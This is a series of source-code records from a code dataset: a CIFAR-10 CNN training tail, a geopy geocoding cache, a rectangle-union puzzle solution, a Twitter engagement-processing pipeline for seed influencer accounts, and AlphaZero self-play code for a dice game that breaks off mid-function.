num_of_epochs += 1\n cur_train_images = next_train_images\n cur_train_labels = next_train_labels\n p = Process(target=load_batch, args=())\n p.start()\n #batch_index += 1\n # if batch_index == 6:\n # batch_index = 1\n if step % display_step == 0:\n # Calculate batch loss and accuracy\n summary, loss, acc = session.run([merged, cost, accuracy], feed_dict={x: batch_x,\n y: batch_y,\n keep_prob: 1.,\n keep_prob2: 1.})\n\n print(\"Iter \" + str(step*batch_size) + \", Minibatch Loss= \" + \\\n \"{:.6f}\".format(loss) + \", Training Accuracy= \" + \\\n \"{:.5f}\".format(acc))\n train_writer.add_summary(summary, i_global)\n\n step += 1\n batch_num += 1\n\n# if step % 7000 == 0:\n# learning_rate /= 10\n\n # Save a checkpoint to disk every 1000 iterations (and last).\n if (i_global % 5000 == 0) or (step*batch_size == training_iters - 1):\n # Save all variables of the TensorFlow graph to a\n # checkpoint. 
Append the global_step counter\n # to the filename so we save the last several checkpoints.\n saver.save(session,\n save_path=save_path,\n global_step=global_step)\n\n print(\"Saved checkpoint.\")\n\nprint(\"Optimization Finished!\")\n\nsum = 0\n\nfor num in range(0, 70):\n # print(num)\n test = session.run(accuracy, feed_dict={x: test_images[num * 128:128 + num * 128],\n y: test_labels[num * 128:128 + num * 128],\n keep_prob: 1.,\n keep_prob2: 1.})\n\n\n sum += test\n\nprint (\"Test accuracy = \", sum/70)\nprint (\"Ran number of epochs\",num_of_epochs)\n\n#saver.save(sess,'model')\n\n\n#######################\n## Confusion Matrix\n#######################\n\nconfusion = np.zeros([10, 10], float)\nprediction = tf.argmax(pred, 1)\n\nfor num in range(0, 70):\n labels = session.run(prediction, feed_dict={x: test_images[num * 128:128 + num * 128],\n y: test_labels[num * 128:128 + num * 128],\n keep_prob: 1.,\n keep_prob2: 1.})\n\n mytest_labels = test_labels2[num * 128:128 + num * 128]\n \n for i in range(0, 128):\n confusion[mytest_labels[i]][labels[i]] += 1\n\nconfusion = confusion / confusion.sum(axis=0)\n\n\nplt.matshow(confusion)\nplt.title('Confusion matrix')\nplt.colorbar()\nplt.ylabel('True label')\nplt.xlabel('Predicted label')\nplt.show()\n\n\n","sub_path":"cifar10_1_all_cnn_C_regularization_e.py","file_name":"cifar10_1_all_cnn_C_regularization_e.py","file_ext":"py","file_size_in_byte":19943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"621493474","text":"from geopy.geocoders import Nominatim\nfrom geopy.geocoders import GoogleV3\nfrom geopy.exc import GeocoderQuotaExceeded\nfrom .models import Cache\nfrom django.core.exceptions import ObjectDoesNotExist\n# return tp (v_addr- raw address, lat, lng)\n\nclass tp(object):\n\tdef __init__(self, viezd):\n\t\tsuper(tp, self).__init__()\n\t\tself.viezd = viezd\n\t\t#self.geolocator = Nominatim()\n\t\tself.geolocator = GoogleV3()\n\t\tself.geolocator_Nom = Nominatim()\n\t\tself.v_addr=viezd.address\n\n\n\t\t#if v in cache return cord\n\t\ttry:\n\t\t\tv_from_c=Cache.objects.get(address=self.v_addr)\n\t\t\tself.lat=v_from_c.lat\n\t\t\tself.lng=v_from_c.lng\n\n\t\texcept ObjectDoesNotExist:\n\n\t\t#else use geopy and add cord to cache\n\t\t\ttry:\n\t\t\t\tself.v_gps = self.geolocator.geocode(self.v_addr)\n\t\t\texcept:\n\t\t\t\tself.v_gps = self.geolocator_Nom.geocode(self.v_addr)\n\t\t\n\t\t\tself.lat=self.v_gps.latitude\n\t\t\tself.lng=self.v_gps.longitude\n\t\t\tv_to_c= Cache(address=self.v_addr, lat=self.lat, lng=self.lng)\n\t\t\tv_to_c.save()\n\t\n\n\n\t\t","sub_path":"cyfra_logistic/gps.py","file_name":"gps.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"366147979","text":"# Problem [2669] : 직사각형 네개의 합집합의 면적 구하기\n# 입력은 네 줄, 각 줄은 직사각형의 위치를 나타내는 네 개의 정수로 주어진다.\n# 입력 = x1 y1 x2 y2\n# 모든 좌표는 1이상 100이하의 정수이다.\n\n\nmatrix = [[0 for _ in range(101)] for _ in range(101)]\nresult = 0\nfor _ in range(4) :\n x1, y1, x2, y2 = map(int,input().split())\n for x in range(x1,x2) :\n for y in range(y1,y2) :\n if matrix[x][y] != 1 :\n matrix[x][y] = 1\n result += 1 \nprint(result)","sub_path":"Baekjoon/Olympiad/BOJ_2669.py","file_name":"BOJ_2669.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"258739355","text":"import pandas as pd\nimport json\nimport time\nimport os\nimport datetime as dt\nimport 
re\nimport wget\n \ndef tidy_tweets(file_name):\n '''Converts json raw tweets into tidy df'''\n\n ### This is to look for unattributed retweets\n seed_tweets_dict, screen_name_dict = {}, {}\n if \"seed_tweets.csv\" in os.listdir('data/processed/seed_tweets/'):\n seed_tweets = pd.read_csv('data/processed/seed_tweets/seed_tweets.csv')\n for idx, row in seed_tweets.iterrows():\n seed_tweets_dict[row['text']] = [row['screen_name'], row['id'], row['user_id']]\n screen_name_dict[row['screen_name']] = row['id']\n \n id_list, datetime_list, screen_name_list, user_id_list, text_list = [], [], [], [], []\n in_reply_to_user_id_list, in_reply_to_status_id_list, in_reply_to_screen_name_list = [], [], []\n rt_screen_name_list, rt_user_id_list, rt_id_list, rt_type_list = [], [], [], []\n qt_screen_name_list, qt_id_list, qt_status_list = [], [], []\n mentions_list, hashtags_list = [], []\n photos_list, videos_list, gifs_list = [], [], []\n urls_list, trunc_url_list = [], []\n \n with open(file_name) as json_data:\n for idx, tweet in enumerate(json_data):\n \n try:\n tweet = json.loads(tweet)\n except:\n print('could not open line ',idx)\n continue\n\n id_list.append(\"id_\" + str(tweet['id']))\n screen_name_list.append(tweet[\"user\"]['screen_name'])\n user_id_list.append(\"id_\" + str(tweet[\"user\"]['id']))\n\n rp_user_id = \"id_\" + str(tweet[\"in_reply_to_user_id\"])\n rp_screen_name = tweet[\"in_reply_to_screen_name\"]\n rp_status = \"id_\" + str(tweet[\"in_reply_to_status_id\"]) if tweet[\"in_reply_to_status_id\"] is not None else None\n\n t = time.strftime('%Y-%m-%d %H:%M:%S', time.strptime(tweet['created_at'],'%a %b %d %H:%M:%S +0000 %Y'))\n datetime_list.append(t)\n\n text = tweet['text'] if \"text\" in tweet else tweet['full_text']\n\n rt_screen_name, rt_user_id, rt_id, rt_type = None, None, None, None\n qt_id, qt_screen_name, qt_status = None, None, None\n\n mentions = set([x['screen_name'] for x in tweet['entities']['user_mentions']])\n\n if 'retweeted_status' in tweet: # It is a retweet\n text = tweet['retweeted_status']['text'] if 'text' in tweet['retweeted_status'] else tweet['retweeted_status']['full_text']\n try:\n text = tweet['retweeted_status']['extended_tweet']['full_text']\n mentions = set([x['screen_name'] for x in tweet['retweeted_status']['extended_tweet']['entities']['user_mentions']])\n except:\n pass\n rt_screen_name = tweet['retweeted_status']['user']['screen_name']\n rt_user_id = \"id_\" + str(tweet['retweeted_status']['user']['id'])\n rt_id = \"id_\" + str(tweet['retweeted_status']['id'])\n rt_type = 'official'\n \n if 'quoted_status' in tweet: # In reply to tweet data\n qt_id = \"id_\" + str(tweet[\"quoted_status\"][\"user\"][\"id\"])\n qt_screen_name = tweet[\"quoted_status\"][\"user\"][\"screen_name\"]\n qt_status = tweet[\"quoted_status\"][\"text\"] if 'text' in tweet['quoted_status'] else tweet['quoted_status']['full_text']\n try:\n qt_status = tweet[\"quoted_status\"][\"extended_tweet\"]['full_text']\n except:\n pass\n\n if 'extended_tweet' in tweet:\n text = tweet['extended_tweet']['full_text']\n mentions = set([x['screen_name'] for x in tweet['extended_tweet']['entities']['user_mentions']])\n \n # Look for unofficial retweets\n if rt_screen_name is None and re.search(r'^(RT|Rt|rt|retweet)(?:\\b\\W*@(\\w+)) (.*)', text):\n rt_screen_name = re.search(r'^(RT|Rt|rt|retweet)(?:\\b\\W*@(\\w+)) (.*)', text)[2]\n rt_type = 'unofficial accredited'\n if re.search(r'^(RT|Rt|rt|retweet)(?:\\b\\W*@(\\w+)) (.*)', text)[3] in seed_tweets_dict:\n rt_id = seed_tweets_dict[text][1]\n 
rt_user_id = seed_tweets_dict[text][2]\n            \n            # Look for unofficial uncredited retweets\n            if rt_screen_name is None and text in seed_tweets_dict:\n                rt_screen_name = seed_tweets_dict[text][0]\n                rt_id = seed_tweets_dict[text][1]\n                rt_user_id = seed_tweets_dict[text][2]\n                rt_type = 'unofficial unaccredited'\n\n            text_list.append(text)\n            in_reply_to_status_id_list.append(rp_status)\n            in_reply_to_user_id_list.append(rp_user_id)\n            in_reply_to_screen_name_list.append(rp_screen_name)\n            rt_screen_name_list.append(rt_screen_name)\n            rt_user_id_list.append(rt_user_id)\n            rt_id_list.append(rt_id)\n            rt_type_list.append(rt_type)\n            qt_id_list.append(qt_id)\n            qt_screen_name_list.append(qt_screen_name)\n            qt_status_list.append(qt_status)\n            mentions_list.append(\", \".join(list(mentions)))\n\n            photo, video, gif = [], [], []\n            if \"media\" in tweet['entities']:\n                for media in tweet['extended_entities']['media']:\n                    if media['type'] == 'photo':\n                        photo.append(media['media_url'])\n                    elif media['type'] == 'video':\n                        video.append(media['video_info']['variants'][0]['url'])\n                    elif media['type'] == 'animated_gif':\n                        gif.append(media['video_info']['variants'][0]['url'])\n            \n            photos_list.append(\", \".join(photo))\n            videos_list.append(\", \".join(video))\n            gifs_list.append(\", \".join(gif))\n\n            if len(tweet['entities']['urls']) > 0:\n                if \"extended_tweet\" in tweet:\n                    url = [item['expanded_url'] for item in tweet['extended_tweet']['entities']['urls']]\n                else:\n                    url = [item['expanded_url'] for item in tweet['entities']['urls']]\n                \n                urls_list.append(\", \".join(url))\n                trunc_url_list.append(\", \".join([re.search('://(www.)?([a-zA-Z0-9.-]+)',x).group(2) for x in url]))\n            \n            else:\n                urls_list.append(\"\")\n                trunc_url_list.append(\"\")\n\n            if len(tweet['entities']['hashtags']) > 0 :\n                hashtags_list.append(\n                    \", \".join([item['text'] for item in tweet['entities']['hashtags']]))\n            else:\n                hashtags_list.append(\"\")\n\n\n    data = pd.DataFrame({\n        \"id\" : id_list,\n        \"screen_name\": screen_name_list,\n        \"user_id\": user_id_list,\n        \"text\": text_list,\n        \"rt_from_screen_name\": rt_screen_name_list,\n        \"rt_from_user_id\": rt_user_id_list,\n        \"rt_from_id\": rt_id_list,\n        \"qt_from_screen_name\": qt_screen_name_list,\n        'qt_status': qt_status_list,\n        \"in_reply_to_screen_name\": in_reply_to_screen_name_list,\n        \"in_reply_to_status_id\": in_reply_to_status_id_list,\n        \"mentions\": mentions_list,\n        \"datetime\":datetime_list,\n        \"rt_type\": rt_type_list,\n        \"url\":urls_list,\n        \"trunc_url\":trunc_url_list,\n        \"hashtags\":hashtags_list,\n        \"photos\":photos_list,\n        \"videos\":videos_list,\n        \"gifs\":gifs_list})\n\n    return data\n\nclass process_tweets():\n    def __init__(self, day_to_process):\n        self.day_to_process = day_to_process\n\n        print(\"> tidy stream\")\n        self.tweets = tidy_tweets('data/raw/stream_tweets_{}.json'.format(day_to_process))\n        print(\">> extract seed\")\n        self.extract_seed_tweets(get_media=True)\n        \n        print(\">> extract retweets\")\n        self.extract_seed_retweets()\n        \n        print(\">> get id values\")\n        tweets_ids = self.tweets.id.values\n        del self.tweets\n        \n        print(\"> tidy rest\")\n        self.tweets = tidy_tweets('data/raw/rest_tweets_{}.json'.format(day_to_process))\n        print(\">> filtering tweets not in stream\")\n        self.tweets = self.tweets[~self.tweets.id.isin(tweets_ids)]\n        print(\">> extract seed\")\n        self.extract_seed_tweets(get_media=True)\n\n        print(\">> extract retweets\")\n        self.extract_seed_retweets()\n        del self.tweets\n\n        self.unify_daily_followers_list()\n        \n        \n        \n    def extract_seed_tweets(self, get_media=False):\n        '''\n        
Filters influencer tweets \n input: raw json files\n output: \n - seed_tweets.csv\n - seed_tweet_ids.csv (to track future retweets)\n '''\n print(\">>> Extracting seed tweets df, saving to data/processed/seed_tweets/seed_tweets_.csv\")\n \n seed_tweets = self.tweets[(self.tweets.user_id.isin(user_ids))].drop_duplicates('id')\n\n self.len_new_tweets = len(seed_tweets)\n if get_media:\n print('getting media')\n for idx, row in seed_tweets.iterrows():\n\n if len(row['photos']) > 0:\n for photo in row['photos'].split(\", \"):\n try:\n wget.download(photo, \"data/processed/media_by_tweet/{}.jpg\".format(row['id']))\n except Exception as e:\n pass\n\n if len(row['videos']) > 0:\n for video in row['videos'].split(\", \"):\n try:\n wget.download(video, \"data/processed/media_by_tweet/{}.mp4\".format(row['id']))\n except Exception as e:\n pass\n\n if len(row['gifs']) > 0:\n for gif in row['gifs'].split(\", \"):\n try:\n wget.download(gif, \"data/processed/media_by_tweet/{}.mp4\".format(row['id']))\n except Exception as e:\n pass\n\n # Write full dataframe\n if not os.path.isfile(\"data/processed/seed_tweets/seed_tweets_{}.csv\".format(time.strftime(\"%y%W\"))):\n seed_tweets.to_csv('data/processed/seed_tweets/seed_tweets_{}.csv'.format(time.strftime(\"%y%W\")), index=False)\n else:\n seed_tweets.to_csv('data/processed/seed_tweets/seed_tweets_{}.csv'.format(time.strftime(\"%y%W\")), index=False, header=False, mode='a')\n \n print(\">>> Extracting seed tweets_id list, saving to data/seed_tweets_ids.csv\")\n # Keep a list of seed tweets ids\n with open('data/processed/seed_tweets_ids.csv', 'a') as f: \n for tweet_id in seed_tweets.id.values:\n f.write(\"%s\\n\" % tweet_id)\n \n def extract_seed_retweets(self):\n '''\n Extracts engagement with influencer tweets. Separates all from candace owens and charlie kirk\n for processing purposes. 
\n\n input: all tidy tweets\n output: \n - retweets.csv\n - retweets_cc.csv (candace owens and charlie kirk)\n '''\n print(\">>> Extracting engagement from seeds df, saving to data/processed/engagement/engagement.csv\")\n with open('data/processed/seed_tweets_ids.csv') as file:\n ids = file.read().splitlines()\n \n # Filtering out candace and charlie's retweets\n \n seed_retweets = self.tweets[ self.tweets.rt_from_screen_name.isin(screen_names_rest) | ### retweet\n (\n (self.tweets.rt_from_id.isna()) &\n (self.tweets.in_reply_to_screen_name.isin(screen_names_rest) &\n (self.tweets.in_reply_to_status_id.notna()))) | ### reply\n (\n (self.tweets.rt_from_id.isna()) &\n (self.tweets.qt_from_screen_name.isin(screen_names_rest))) ### quote\n ]\n \n print('finish filtering')\n if not os.path.isfile('data/processed/seed_retweets/retweets_from_seeds_{}.csv'.format(time.strftime(\"%y%W\"))):\n seed_retweets.to_csv(\"data/processed/seed_retweets/retweets_from_seeds_{}.csv\".format(time.strftime(\"%y%W\")), index=False)\n else:\n seed_retweets.to_csv(\"data/processed/seed_retweets/retweets_from_seeds_{}.csv\".format(time.strftime(\"%y%W\")), index=False, header=False, mode='a')\n \n \n print(\">>> Extracting retweeters screen_name and id, saving to data/retweeters_users.csv\")\n if 'retweeters_users.csv' in os.listdir('data/processed/'):\n current_retweeters = pd.read_csv('data/processed/retweeters_users.csv')[[\"screen_name\",\"user_id\"]]\n new_retweeters = seed_retweets[~seed_retweets.user_id.isin(current_retweeters.user_id)][[\"screen_name\",\"user_id\"]]\n new_retweeters = new_retweeters.drop_duplicates()\n else:\n new_retweeters = seed_retweets[[\"screen_name\",\"user_id\"]].drop_duplicates()\n \n new_retweeters.to_csv('data/processed/retweeters_users.csv', index=False, mode='a')\n n_retweets = len(seed_retweets)\n n_rtters = len(new_retweeters)\n\n # Collecting candace and charlies retweets\n\n seed_retweets = self.tweets[ self.tweets.rt_from_screen_name.isin(screen_names_cc) | ### retweet\n (\n (self.tweets.rt_from_id.isna()) &\n (self.tweets.in_reply_to_screen_name.isin(screen_names_cc) &\n (self.tweets.in_reply_to_status_id.notna()))) | ### reply\n (\n (self.tweets.rt_from_id.isna()) &\n (self.tweets.qt_from_screen_name.isin(screen_names_cc))) ### quote\n ]\n\n\n if not os.path.isfile('data/processed/seed_retweets/retweets_from_seeds_cc_{}.csv'.format(time.strftime(\"%y%W\"))):\n seed_retweets.to_csv(\"data/processed/seed_retweets/retweets_from_seeds_cc_{}.csv\".format(time.strftime(\"%y%W\")), index=False)\n else:\n seed_retweets.to_csv(\"data/processed/seed_retweets/retweets_from_seeds_cc_{}.csv\".format(time.strftime(\"%y%W\")), index=False, header=False, mode='a')\n\n\n print(\">>> Extracting retweeters screen_name and id, saving to data/retweeters_users_cc.csv\")\n if 'retweeters_users_cc.csv' in os.listdir('data/'):\n current_retweeters = pd.read_csv('data/processed/retweeters_users_cc.csv')[[\"screen_name\",\"user_id\"]]\n new_retweeters = seed_retweets[~seed_retweets.user_id.isin(current_retweeters.user_id)][[\"screen_name\",\"user_id\"]]\n new_retweeters = new_retweeters.drop_duplicates()\n else:\n new_retweeters = seed_retweets[[\"screen_name\",\"user_id\"]].drop_duplicates()\n\n new_retweeters.to_csv('data/processed/retweeters_users_cc.csv', index=False, mode='a')\n \n n_retweets_cc = len(seed_retweets)\n n_rtters_cc = len(new_retweeters)\n\n report = pd.DataFrame({\"date\":[self.day_to_process], \"new_seed_tweets\":[self.len_new_tweets], \"n_retweet\":[n_retweets],\\\n 
\"new_rtters\":[n_rtters], \"new_rtweets_cc\":[n_retweets_cc], \"new_rtters_cc\":[n_rtters_cc]})\n if not os.path.isfile('process_report.csv'):\n report.to_csv(\"process_report.csv\", index=False)\n else:\n report.to_csv(\"process_report.csv\", index=False, header=False, mode='a')\n\n def unify_daily_followers_list(self):\n '''Takes all seed and retweeters followers files\n (different hours or access points) and creates a single dataframe\n to collect their profiles'''\n seed_files = os.listdir('data/processed/seed_followers')\n seed_files = [f for f in seed_files if 'seed_followers_{}'.format(self.day_to_process) in f]\n print(seed_files)\n all_files = []\n for file in seed_files:\n all_files.append(pd.read_csv('data/processed/seed_followers/{}'.format(file), header = None))\n\n daily_seed_followers = pd.concat(all_files)\n daily_seed_followers.columns = ['ego', 'follower']\n daily_seed_followers.drop_duplicates(['ego','follower'], inplace=True)\n daily_seed_followers.to_csv('data/processed/seed_followers/seed_daily_followers_{}.csv'.format(self.day_to_process), index=False)\n\n del daily_seed_followers\n del all_files\n\n retweeters_files = os.listdir('data/processed/retweeters_followers')\n retweeters_files = [f for f in retweeters_files if 'retweeters_followers_{}'.format(self.day_to_process) in f]\n print(retweeters_files)\n all_files = []\n for file in retweeters_files:\n print(file)\n try:\n all_files.append(pd.read_csv('data/processed/retweeters_followers/{}'.format(file), header = None))\n except Exception as e:\n print(e)\n\n try:\n daily_retweeters_followers = pd.concat(all_files[:8])\n daily_retweeters_followers.columns = ['ego', 'follower']\n daily_retweeters_followers.drop_duplicates(['ego','follower'], inplace=True)\n daily_retweeters_followers.to_csv('data/processed/retweeters_followers/retweeters_daily_followers_{}_0.csv'.format(self.day_to_process), index=False)\n except:\n pass\n try:\n daily_retweeters_followers = pd.concat(all_files[8:])\n daily_retweeters_followers.columns = ['ego', 'follower']\n daily_retweeters_followers.drop_duplicates(['ego','follower'], inplace=True)\n daily_retweeters_followers.to_csv('data/processed/retweeters_followers/retweeters_daily_followers_{}_1.csv'.format(self.day_to_process), index=False)\n except:\n pass\n\nif __name__ == \"__main__\":\n ### Designed to be processed daily with a cron job\n\n users = pd.read_csv(\"data/seed_users.csv\")\n user_ids = [\"id_\" + str(x) for x in users.user_id.values]\n\n ### Separating candace owens and charlie kirk to manage engagement processing\n screen_names_cc = ['RealCandaceO','charliekirk11']\n screen_names_rest = [x for x in users.screen_name.values if x not in screen_names_cc]\n \n yesterday = dt.datetime.strftime(dt.datetime.now() - dt.timedelta(1), '%y%m%d')\n\n print(\"Processing day: \", yesterday)\n process_tweets(day_to_process=yesterday)\n\n","sub_path":"data_collection/process_tweets.py","file_name":"process_tweets.py","file_ext":"py","file_size_in_byte":18735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"208225094","text":"from game import Game\nimport time\nimport copy\nimport os\nimport pickle\nimport psutil\nimport os.path\nimport gc\nfrom players.vanilla_uct_player import Vanilla_UCT\nfrom players.alphazero_player import AlphaZeroPlayer\nfrom players.uct_player import UCTPlayer\nfrom statistics import Statistic\nfrom concurrent.futures import ProcessPoolExecutor\n\nclass Experiment:\n\n def __init__(self, n_players, 
dice_number, dice_value, column_range,\n        offset, initial_height, max_game_length, reg, conv_number, n_cores):\n        \"\"\"n_cores is the number of cores used for parallel computations. \"\"\"\n        self.n_players = n_players\n        self.dice_number = dice_number\n        self.dice_value = dice_value\n        self.column_range = column_range \n        self.offset = offset\n        self.initial_height = initial_height\n        self.max_game_length = max_game_length\n        self.reg = reg\n        self.conv_number = conv_number\n        self.n_cores = n_cores\n\n    def _play_single_game(self, args):\n        \"\"\"\n        Play a single game between player1 and player2.\n        Return the data of the game in a NN channel format and who won.\n        If the game reaches the maximum number of iterations, it returns 0,\n        representing a draw. \n        Return an empty list if neither player is an instance of \n        AlphaZeroPlayer, otherwise return the data collected from the game.\n        Return 1 if player1 won and 2 if player2 won.\n        \"\"\"\n\n        player1 = args[0]\n        player2 = args[1]\n        type_of_game = args[2]\n        player1_weights = args[3]\n        player2_weights = args[4]\n\n        from keras import backend as K \n        K.set_image_data_format('channels_first') \n        # Selfplay\n        if type_of_game == 's':\n            from models import define_model\n            current_model = define_model(\n                reg = self.reg, \n                conv_number = self.conv_number, \n                column_range = self.column_range, \n                offset = self.offset, \n                initial_height = self.initial_height, \n                dice_value = self.dice_value\n            )\n            \n            copy_model = define_model(\n                reg = self.reg, \n                conv_number = self.conv_number, \n                column_range = self.column_range, \n                offset = self.offset, \n                initial_height = self.initial_height, \n                dice_value = self.dice_value\n            )\n\n            player1.network = current_model\n            player2.network = copy_model\n            \n            player1.network.set_weights(player1_weights)\n            player2.network.set_weights(player1_weights)\n        # Evaluation vs network\n        elif type_of_game == 'en':\n            from models import define_model\n            current_model = define_model(\n                reg = self.reg, \n                conv_number = self.conv_number, \n                column_range = self.column_range, \n                offset = self.offset, \n                initial_height = self.initial_height, \n                dice_value = self.dice_value\n            )\n            \n            old_model = define_model(\n                reg = self.reg, \n                conv_number = self.conv_number, \n                column_range = self.column_range, \n                offset = self.offset, \n                initial_height = self.initial_height, \n                dice_value = self.dice_value\n            )\n\n            player1.network = current_model\n            player2.network = old_model\n            player1.network.set_weights(player1_weights)\n            player2.network.set_weights(player2_weights)\n        \n        # Evaluation vs UCTs\n        elif type_of_game == 'eu':\n            from models import define_model\n            network = define_model(\n                reg = self.reg, \n                conv_number = self.conv_number, \n                column_range = self.column_range, \n                offset = self.offset, \n                initial_height = self.initial_height, \n                dice_value = self.dice_value\n            )\n            if player1_weights != None:\n                player1.network = network\n                player1.network.set_weights(player1_weights)\n            else:\n                player2.network = network\n                player2.network.set_weights(player2_weights)\n\n        data_of_a_game = []\n        game = Game(self.n_players, self.dice_number, self.dice_value, \n                    self.column_range, self.offset, self.initial_height)\n\n        is_over = False\n        rounds = 0\n        # actions_taken stores consecutive actions from the same player. 
\n # List of tuples (action taken, player turn, Game instance).\n # If players change turn, empty the list.\n actions_taken = []\n actions_from_player = 1\n\n # Loop of the game\n while not is_over:\n rounds += 1\n # Collecting data for later input to the NN if any of the players \n # are subclasses of AlphaZeroPlayer.\n if isinstance(player1, AlphaZeroPlayer) and game.player_turn == 1:\n channel_valid = player1.valid_positions_channel(\n self.column_range, self.offset, \n self.initial_height\n )\n channel_finished_1, channel_finished_2 = \\\n player1.finished_columns_channels(\n game, channel_valid\n )\n channel_won_column_1, channel_won_column_2 = \\\n player1.player_won_column_channels(\n game, channel_valid\n )\n channel_turn = player1.player_turn_channel(game, channel_valid)\n list_of_channels = [channel_valid, \n channel_finished_1, channel_finished_2,\n channel_won_column_1, channel_won_column_2,\n channel_turn\n ]\n elif isinstance(player2, AlphaZeroPlayer) and game.player_turn == 2:\n channel_valid = player2.valid_positions_channel(\n self.column_range, self.offset, \n self.initial_height\n )\n channel_finished_1, channel_finished_2 = \\\n player2.finished_columns_channels(\n game, channel_valid\n )\n channel_won_column_1, channel_won_column_2 = \\\n player2.player_won_column_channels(\n game, channel_valid\n )\n channel_turn = player2.player_turn_channel(game, channel_valid)\n list_of_channels = [channel_valid, \n channel_finished_1, channel_finished_2,\n channel_won_column_1, channel_won_column_2,\n channel_turn\n ]\n moves = game.available_moves()\n if game.is_player_busted(moves):\n actions_taken = []\n actions_from_player = game.player_turn\n continue\n else:\n if game.player_turn == 1:\n if actions_from_player == game.player_turn:\n chosen_play = player1.get_action(game, [])\n else:\n chosen_play = player1.get_action(game, actions_taken)\n dist_probability = []\n if isinstance(player1, UCTPlayer):\n dist_probability = player1.get_dist_probability()\n else:\n if actions_from_player == game.player_turn:\n chosen_play = player2.get_action(game, [])\n else:\n chosen_play = player2.get_action(game, actions_taken)\n dist_probability = []\n if isinstance(player2, UCTPlayer):\n dist_probability = player2.get_dist_probability()\n if isinstance(player1, AlphaZeroPlayer) \\\n and isinstance(player2, AlphaZeroPlayer):\n # Collecting data for network\n current_play = [list_of_channels, dist_probability]\n data_of_a_game.append(current_play)\n\n # Needed because game.play() can automatically change \n # the player_turn attribute.\n actual_player = game.player_turn\n \n # Clear the plays info so far if player_turn \n # changed last iteration.\n if actions_from_player != actual_player:\n actions_taken = []\n actions_from_player = game.player_turn\n\n # Apply the chosen_play in the game\n game.play(chosen_play)\n\n # Save game history\n actions_taken.append((chosen_play, actual_player, \n game.clone())\n )\n\n # if the game has reached its max number of plays, end the game\n # and who_won receives 0, which means no players won.\n\n if rounds > self.max_game_length:\n who_won = 0\n is_over = True\n else:\n who_won, is_over = game.is_finished()\n\n # Game is over, so resets the trees\n player1.reset_tree()\n player2.reset_tree()\n return data_of_a_game, who_won\n\n def _selfplay(self, current_model, current_weights, dataset_for_network, \n n_games, file_name):\n\n with open(file_name, 'a') as f:\n print('SELFPLAY', file=f)\n from keras import backend as K \n print(K.image_data_format(), 
file=f) \n\n start_selfplay = time.time()\n # 0 -> draw\n victory_0 = 0\n victory_1 = 0\n victory_2 = 0\n\n copy_model = current_model.clone()\n\n # ProcessPoolExecutor() will take care of joining() and closing()\n # the processes after they are finished.\n with ProcessPoolExecutor(max_workers=self.n_cores) as executor:\n # Specify which arguments will be used for each parallel call\n args = (\n (current_model, copy_model, 's', current_weights, None) \n for _ in range(n_games)\n )\n # data is a list of 2-tuples = (data_of_a_game, who_won) \n results = executor.map(self._play_single_game, args)\n data_of_all_games = []\n for result in results:\n data_of_all_games.append(result)\n \n for single_game in data_of_all_games:\n data_of_a_game = single_game[0]\n who_won = single_game[1]\n if who_won == 1:\n victory_1 += 1\n elif who_won == 2:\n victory_2 += 1\n else:\n victory_0 += 1\n # Store who actually won in all states\n for state in data_of_a_game:\n if who_won == 1:\n state.append(1)\n elif who_won == 2:\n state.append(-1)\n # Save the data only if it was not a draw\n if who_won != 0:\n dataset_for_network.append(data_of_a_game)\n \n del copy_model\n\n elapsed_time_selfplay = time.time() - start_selfplay\n\n with open(file_name, 'a') as f:\n print(' Selfplay - Player 1 won', victory_1, 'time(s).', \\\n file=f)\n print(' Selfplay - Player 2 won', victory_2, 'time(s).', \\\n file=f)\n print(' Selfplay - Ties:', victory_0, file=f)\n print(' Time elapsed in Selfplay:', elapsed_time_selfplay,\\\n file=f)\n print(' Average time of a game: ', elapsed_time_selfplay \\\n / n_games, 's', sep = '', file=f)\n\n return victory_0, victory_1, victory_2\n\n def _training(self, args):\n current_model = args[0]\n current_weights = args[1]\n dataset_for_network = args[2]\n n_training_loop = args[3]\n mini_batch = args[4]\n epochs = args[5]\n victory_0 = args[6]\n victory_1 = args[7]\n victory_2 = args[8]\n file_name = args[9]\n with open(file_name, 'a') as f:\n print('TRAINING LOOP', file=f)\n \n start_training = time.time()\n\n\n # Transform the dataset collected into network input\n channels_input, valid_actions_dist_input, dist_probs_label, \\\n who_won_label = current_model.transform_dataset_to_input(\n dataset_for_network\n )\n \n from models import define_model\n from keras import backend as K\n K.set_image_data_format('channels_first') \n\n model = define_model(\n reg = self.reg, \n conv_number = self.conv_number, \n column_range = self.column_range, \n offset = self.offset, \n initial_height = self.initial_height, \n dice_value = self.dice_value\n )\n model.set_weights(current_weights)\n current_model.network = model\n \n for i in range(n_training_loop):\n # Sample random mini_batch inputs for training\n x_train, y_train = current_model.sample_input(\n channels_input, valid_actions_dist_input, \n dist_probs_label, who_won_label, \n mini_batch\n )\n\n history_callback = current_model.network.fit(\n x_train, y_train, epochs = epochs, \n shuffle = True, verbose = 0\n )\n\n if i == n_training_loop - 1:\n # Saving data\n loss = sum(history_callback.history[\"loss\"]) \\\n / len(history_callback.history[\"loss\"])\n dist_metric = \\\n sum(history_callback.history[\n \"Output_Dist_categorical_crossentropy\"\n ]) \\\n / len(history_callback.history[\n \"Output_Dist_categorical_crossentropy\"\n ])\n value_metric = \\\n sum(history_callback.history[\n \"Output_Value_mean_squared_error\"\n ]) \\\n / len(history_callback.history[\n \"Output_Value_mean_squared_error\"\n ])\n \n training_tuple = (\n loss, 
